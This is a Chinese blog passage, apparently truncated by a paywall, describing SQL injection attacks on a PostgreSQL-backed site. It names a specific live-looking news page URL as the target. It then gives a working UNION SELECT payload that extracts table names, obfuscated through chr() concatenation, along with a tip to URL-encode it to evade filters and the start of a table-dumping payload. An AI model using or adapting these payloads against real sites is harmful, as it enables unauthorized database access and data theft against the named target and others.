本文通过抓包分析了针对PostgreSQL的一系列SQL注入攻击,包括爆表、爆字段、读取文件和获取数据库信息等操作,揭示了数据库的安全风险及其防范措施。
http://www.kmttp.org.tw/kmt/news/news_im_context.jsp?nid=161210171300
GET /kmt/news/news_im_context.jsp?nid=161210171300’and 1=2 uNion SelEct null,null,null,null,null,null,null,null,chr(64)||chr(116)||chr(104)||chr(101)||chr(115)||chr(116)||chr(97)||chr(114)||chr(116)||relname||chr(64)||chr(116)||chr(104)||chr(101)||chr(101)||chr(110)||chr(100),null,null from (select * from (select * from pg_stat_user_tables order by 1 limit 1 )t order by 1 desc limit 1)t–
全部转换成url编码可饶过部分过虑如:将下面的转换
and 1=2 uNion SelEct null,null,null,null,null,null,null,null,chr(64)||chr(116)||chr(104)||chr(101)||chr(115)||chr(116)||chr(97)||chr(114)||chr(116)||relname||chr(64)||chr(116)||chr(104)||chr(101)||chr(101)||chr(110)||chr(100),null,null from (select * from (select * from pg_stat_user_tables order by 1 limit 1 )t order by 1 desc limit 1)t–
爆表:
and 1=2 uNion SelEct ‘1111’,‘222’,‘333’,null,‘5
最低0.47元/天 解锁文章
扫一扫
评论
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
查看更多评论
添加红包
